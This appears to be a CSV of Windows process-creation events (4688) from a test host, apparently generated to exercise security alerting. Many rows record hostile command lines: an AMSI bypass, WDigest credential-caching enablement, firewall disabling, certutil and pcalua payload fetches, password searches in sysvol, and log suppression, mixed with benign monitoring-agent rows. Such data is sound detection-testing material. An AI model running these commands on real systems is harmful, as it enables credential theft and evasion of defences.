160,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.950,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1660,C:\Windows\System32\net.exe,%%1936,0xbc8,net v: /delete,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.950
161,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.967,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1658,C:\Windows\System32\net1.exe,%%1936,0x1660,C:\Windows\system32\net1 v: /delete,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.967
162,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.020,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x169c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd /c C:\Windows\System32\mshta.exe vbscript:CreateObject(""Wscript.Shell"").Run("".\powershell.exe -c """"$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion Certificate).Certificate);.\powershell -E $y"""""",0,True)(window.close)",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.020
163,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.067,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x168c,C:\Diagnostics\UserTmp\netsh.exe,%%1936,0xbc8,.\netsh advfirewall firewall add rule name=RbtGskQ action=allow program=c:\users\Bob\appdata\Roaming\RbtGskQ\RbtGskQ.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.067
164,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.117,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16c8,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg add HKLM\KEY_LOCAL_MACHINE\...securityproviders\wdigest uselogoncredential /t 1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.117
165,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.217,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1560,C:\Windows\System32\conhost.exe,%%1936,0x1550,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\vssadmin.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.217
166,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.220,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x158c,C:\Windows\System32\cmd.exe,%%1936,0xbc8,c:\Windows\System32\cmd.exe /c net user,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.220
167,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.257,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15d0,C:\Windows\System32\conhost.exe,%%1936,0x158c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.257
168,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.363,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15c8,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd /c c:\Diagnostics\UserTmp\scrsave.scr""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.363
169,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.410,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15ec,C:\Diagnostics\UserTmp\svchost.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\svchost.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.410
170,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.457,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15e8,C:\Diagnostics\UserTmp\smss.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\smss.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.457
171,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.493,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1630,C:\Windows\System32\svchost.exe,%%1936,0xbc8,c:\Windows\System32\svchost.exe -k malicious,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.493
172,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.520,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1668,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd.exe /c echo createobject""msxml2.xmlhttp"") ",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.520
173,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.570,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1658,C:\Diagnostics\UserTmp\ASC_Alerttest_662jfi039n.exe,%%1936,0xbc8,ASC_Alerttest_662jfi039n.exe -foo,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.570
174,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.580,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1664,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.580
175,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.650,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16d4,C:\Diagnostics\UserTmp\netsh.exe,%%1936,0xbc8,netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.650
176,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.080,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16c0,C:\Diagnostics\UserTmp\wuauclt.exe,%%1936,0xbc8,".\wuauclt.exe /C ""c:\windows\softwaredistribution\cscript.exe""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.080
177,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.147,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1704,C:\Windows\SoftwareDistribution\cscript.exe,%%1936,0x16c0,c:\windows\softwaredistribution\cscript.exe,C:\Diagnostics\UserTmp\wuauclt.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.147
178,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.230,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16fc,C:\Windows\System32\net1.exe,%%1936,0x1704,C:\Windows\system32\net1,C:\Windows\SoftwareDistribution\cscript.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.230
179,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:36:24.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11cc,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:36:24.010
180,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:36:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x99c,C:\Windows\System32\conhost.exe,%%1936,0x11cc,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:36:24.027
181,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:36:25.517,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11c4,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:36:25.517
182,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:36:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd14,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:36:26.000
183,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:49:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xaa8,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:49:26.010
184,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:50:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x138c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:50:24.000
185,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:50:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa60,C:\Windows\System32\conhost.exe,%%1936,0x138c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:50:24.017
186,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:50:25.693,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xab8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:50:25.693
187,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:50:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xfbc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:50:26.010
188,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:33:26.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1380,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:33:26.003
189,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:33:32.463,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x5cc,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:33:32.463
190,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.287,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16f4,C:\Diagnostics\UserTmp\lsass.exe,%%1936,0xbc8,".\lsass.exe /C ""c:\windows\softwaredistribution\cscript.exe""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.287
191,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.300,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1770,C:\Windows\SoftwareDistribution\cscript.exe,%%1936,0x16f4,c:\windows\softwaredistribution\cscript.exe,C:\Diagnostics\UserTmp\lsass.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.300
192,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.320,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1774,C:\Windows\System32\net1.exe,%%1936,0x1770,C:\Windows\system32\net1,C:\Windows\SoftwareDistribution\cscript.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.320
193,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.337,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1728,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd /c ""powershell wscript.shell used to download a .gif""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.337
194,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.403,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1798,C:\Diagnostics\UserTmp\cacls.exe,%%1936,0xbc8,cacls.exe c:\windows\system32\wscript.exe /e /t /g everyone:f,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.403
195,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.450,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1758,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd /c ""cd /d ""C:\inetpub\wwwroot""&c:\windows\system32\inetsrv\appcmd set config ""Default Web Site/"" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.450
196,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.500,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17a8,C:\Diagnostics\UserTmp\2840.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\2840.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.500
197,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.547,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17f8,C:\Diagnostics\UserTmp\a_keygen.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\a_keygen.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.547
198,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.553,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17cc,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd /c echo "" SYSTEMINFO && SYSTEMINFO && DEL """,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.553
199,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.630,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1414,C:\Diagnostics\UserTmp\bittorrent.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\bittorrent.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.630
200,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.670,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x28c,C:\Diagnostics\UserTmp\netsh.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\netsh.exe firewall set opmode mode=disable profile=all,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.670
201,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.707,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xc18,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,cmd /c echo rundll32.exe perfc.dat,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.707
202,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.770,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1404,C:\Diagnostics\UserTmp\ransomware.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\ransomware.exe @ abc.com abc.wallet,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.770
203,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.820,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x147c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,cmd /c echo /e:vbscript.encode /b,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.820
204,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.867,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1464,C:\Diagnostics\UserTmp\pcalua.exe,%%1936,0xbc8,pcalua.exe -a \\server\payload.dll,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.867
205,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.917,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14b8,C:\Diagnostics\UserTmp\findstr.exe,%%1936,0xbc8,findstr /si password sysvol *.txt,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.917
206,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.967,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14ec,C:\Diagnostics\UserTmp\odbcconf.exe,%%1936,0xbc8,odbcconf.exe /S /A {REGSVR C:\Users\Administrator\AppData\Roaming\{RANDOM}.txt,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.967
207,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.010,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14f0,C:\Diagnostics\UserTmp\odbcconf.exe,%%1936,0xbc8,odbcconf.exe /f my.rspáá,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.010
208,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.060,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14e8,C:\Diagnostics\UserTmp\SQLDumper.exe,%%1936,0xbc8,sqldumper.exe 464 0 0x0110:40,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.060
209,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.127,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1564,C:\Diagnostics\UserTmp\mt.exe,%%1936,0xbc8,mt.exe port,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.127
210,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.180,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x155c,C:\Diagnostics\UserTmp\mt.exe,%%1936,0xbc8,mt.exe smb,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.180
211,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.223,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15b8,C:\Diagnostics\UserTmp\hd.exe,%%1936,0xbc8,hd.exe -pslist,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.223
212,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.337,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15d0,C:\Diagnostics\UserTmp\hd.exe,%%1936,0xbc8,hd.exe -enum,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.337
213,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.403,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x158c,C:\Diagnostics\UserTmp\netsh.exe,%%1936,0xbc8,netsh.exe PortOpenning,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.403
214,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.447,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1638,C:\Diagnostics\UserTmp\certutil.exe,%%1936,0xbc8,certutil -urlcache -split -f http://127.0.0.1/ ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.447
